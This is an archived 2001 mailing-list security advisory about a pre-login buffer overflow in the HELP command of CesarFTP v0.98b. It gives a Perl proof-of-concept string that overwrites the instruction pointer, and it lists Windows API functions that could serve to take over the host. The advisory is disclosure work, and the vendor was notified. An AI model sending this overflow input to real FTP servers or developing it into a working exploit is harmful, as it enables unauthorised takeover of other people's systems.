cesarFTP v0.98b 'HELP' buffer overflow

From: ByteRage (byterageat_private)
Date: Sat Jun 30 2001 - 02:36:21 PDT

Next message: Joost Pol: "php breaks safe mode"

Previous message: Juergen Pabel: "Vulnerability: CylantSecure"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

DESCRIPTION

CesarFTP v0.98b is vulnerable to a buffer overflow
when sending the HELP command followed by a very long
string of characters.

Example : Sending the following perl string :

"HELP " . ("A" x 1978) . "CCCC\x00\x0D\x0A" 

Happily reroutes the SERVER.EXE EIP to 43434343
("CCCC"). This way, anyone can easily compromise the
win9x/NT/2k system, without the need to be logged in.
The only tricky part in writing the exploit is that
SERVER.EXE doesn't have LoadLibraryA & GetProcAddress
in it's import table, but there are enough other
functions that give away enough power to take over the
computer (registry functions, CreateDirectoryA,
CreateFileA, ReadFile, WriteFile, ShellExecuteA, ...)
I have not written an exploit and probably I never
will :)

VENDOR STATUS

I have sent this advisory to <cesarftpat_private>

greetz,
[ByteRage] <byterageat_private> byterage.cjb.net

__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/

Next message: Joost Pol: "php breaks safe mode"
Previous message: Juergen Pabel: "Vulnerability: CylantSecure"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 01 2001 - 23:04:39 PDT